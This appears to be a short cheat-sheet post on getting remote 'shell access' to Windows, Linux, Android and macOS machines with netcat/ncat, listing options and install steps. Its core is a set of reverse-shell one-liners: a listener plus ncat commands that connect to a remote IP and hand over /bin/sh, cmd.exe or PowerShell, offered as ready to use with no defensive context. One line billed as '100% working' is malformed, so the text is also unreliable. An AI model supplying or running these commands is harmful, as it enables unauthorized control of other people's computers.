ncat - Windows , linux , android & macos shell access

    nc [options] [host] [port] 

    Common Netcat Options:

    • -l: Listen mode - Creates a listening server on a specified port
    • -u: UDP mode - Uses UDP protocol instead of TCP (default)
    • -v: Verbose mode - Provides more output during operation
    • -p <port>: Specify the source port (useful for avoiding conflicts)
    • -t: No delay - Disables Nagle's algorithm for faster data transfer (may not be compatible with all applications)
    • -e <program>: Executes a program after a successful connection (advanced usage)


    $nc -lvp 1234 - linux - port listening

    $ncat ip  1234  -e /bin/sh - android/linux

    $ncat ip  1234  -e cmd.exe/powershell.exe - windows

    $ncat -e 1111 cmd.exe - 100% working

    $nc -vv ip port

    Software neccessary for using ncat 


    Download Nmap and Ncap

    from nmap website.


    Download ncat

    sudo apt install ncat

    #shellaccess #shellaccessinwindows #shellaccessinlinux #shellaccessinandroid


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